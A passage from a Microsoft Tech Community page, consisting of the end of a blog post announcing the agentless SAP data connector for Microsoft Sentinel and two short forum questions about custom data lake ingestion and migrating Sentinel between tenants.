experience compared to the Docker-based approach. Deployment efforts and time to first SAP log arrival in Sentinel went from days and weeks to hours. ⚠️ Deprecation notice for containerized data connector agent ⚠️ The containerised SAP data connector will be deprecated on September 14th, 2026. This change aligns with the discontinuation of the SAP RFC SDK, SAP's strategic integration roadmap, and customer demand for simpler integration. Migrate to the new agentless connector for simplified onboarding and compliance with SAP’s roadmap. All new deployments starting October 31, 2025, will only have the new agentless connector option, and existing customers should plan their migration using the guidance on Microsoft Learn. It will be billed at the same price as the containerized agent, ensuring no cost impact for customers. Note📌: To support transition for those of you on the Docker-based data connector, we have enhanced our built-in KQL functions for SAP to work across data sources for hybrid and parallel execution. Spotlight on new Features Inspired by the feedback of early adopters we are shipping two of the most requested new capabilities with GA right away. Customizable polling frequency: Balance threat detection value (1min intervals best value) with utilization of SAP Integration Suite resources based on your needs. ⚠️Warning! Increasing the intervals may result in message processing truncation to avoid SAP CPI saturation. See this blog for more insights. Refer to the max-rows parameter and SAP documentation to make informed decisions. Customizable API endpoint path suffix: Flexible endpoints allow running all your SAP security integration flows from the agentless connector and adherence to your naming strategies. Furthermore, you can add the community extensions like SAP S/4HANA Cloud public edition (GROW), the SAP Table Reader, and more. Displays the simplified onboarding flow for the agentless SAP connector You want more? Here is your chance to share additional feature requests to influence our backlog. We would like to hear from you! Getting Started with Agentless The new agentless connector automatically appears in your environment – make sure to upgrade to the latest version 3.4.05 or higher. Sentinel Content Hub View: Highlights the agentless SAP connector tile in Microsoft Defender portal, ready for one-click deployment and integration with your security platform The deployment experience on Sentinel is fully automatic with a single button click: It creates the Azure Data Collection Endpoint (DCE), Data Collection Rule (DCR), and Microsoft Entra ID app registration assigned with RBAC role "Monitoring Metrics Publisher" on the DCR to allow SAP log ingest. Explore partner add-ons that build on top of agentless The ISV partner ecosystem for the Microsoft Sentinel Solution for SAP is growing to tailor the agentless offering even further. The current cohort has flagship providers like our co-engineering partner SAP SE themselves with their security products SAP LogServ & SAP Enterprise Threat Detection (ETD), and our mutual partners Onapsis and SecurityBridge. Ready to go agentless? ➤ Get started from here ➤ Explore partner add-ons here. ➤ Share feature requests here. Next Steps Once deployed, I recommend to check AryaG’s insightful blog series for details on how to move to production with the built-in SAP content of agentless. Looking to expand protection to SAP Business Technology Platform? Here you go. #Kudos to the amazing Sentinel for SAP team and our incredible community contributors! That's a wrap 🎬. Remember: bringing SAP under the protection of your central SIEM isn't just a checkbox - it's essential for comprehensive security and compliance across your entire IT estate. Cheers, Martin1.8KViews1like0CommentsIngesting Windows Security Events into Custom Datalake Tables Without Using Microsoft‑Prefixed Table
Hi everyone, I’m looking to see whether there is a supported method to ingest Windows Security Events into custom Microsoft Sentinel Data Lake–tiered tables (for example, SecurityEvents_CL) without writing to or modifying the Microsoft‑prefixed analytical tables. Essentially, I want to route these events directly into custom tables only, bypassing the default Microsoft‑managed tables entirely. Has anyone implemented this, or is there a recommended approach? Thanks in advance for any guidance. Best Regards, Prabhu Kiran129Views0likes1CommentMigrate MS Sentinel from one tenant to another tenant
I need to migrate Microsoft Sentinel with all its resources (playbooks, workbook, connectors, analytics rules), I would need a step by step, since I see that among the documentation that Microsoft has, it does not have it. I would like to know if there is any tool or functionality that allows me to do this, without having to rebuild everything510Views0likes1Comment